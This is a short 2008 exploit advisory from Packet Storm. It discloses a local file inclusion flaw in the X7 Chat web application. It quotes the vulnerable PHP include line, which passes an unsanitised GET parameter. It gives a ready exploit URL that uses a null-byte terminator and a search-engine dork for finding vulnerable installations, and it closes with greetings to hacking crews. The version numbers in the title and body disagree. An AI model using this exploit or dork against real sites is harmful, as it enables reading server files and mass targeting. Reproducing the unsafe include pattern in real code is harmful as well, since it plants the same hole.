x7chat-lfi.txt

2008-09-28T00:00:00
ID PACKETSTORM:70409
Type packetstorm
Reporter NoGe
Modified 2008-09-28T00:00:00

Description

                                        
                                            `====================================================================  
  
  
[o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability  
  
Software : X7 Chat version 2.0.5.1  
Vendor : http://x7chat.com/  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
  
  
====================================================================  
  
  
[o] Vulnerable file  
  
help/mini.php  
  
include("./help/{$_GET['help_file']}");  
  
  
  
[o] Exploit  
  
http://localhost/[path]/help/mini.php?help_file=[LFI]%00  
  
  
  
[o] Dork  
  
"powered by x7 chat"  
  
  
====================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ www.mainhack.com ]  
VOP Crew [ Vaksin13 OoN_BoY Paman ]  
H312Y yooogy mousekill }^-^{ k1tk4t  
skulmatic olibekas ulga Cungkee str0ke  
  
  
====================================================================  
  
`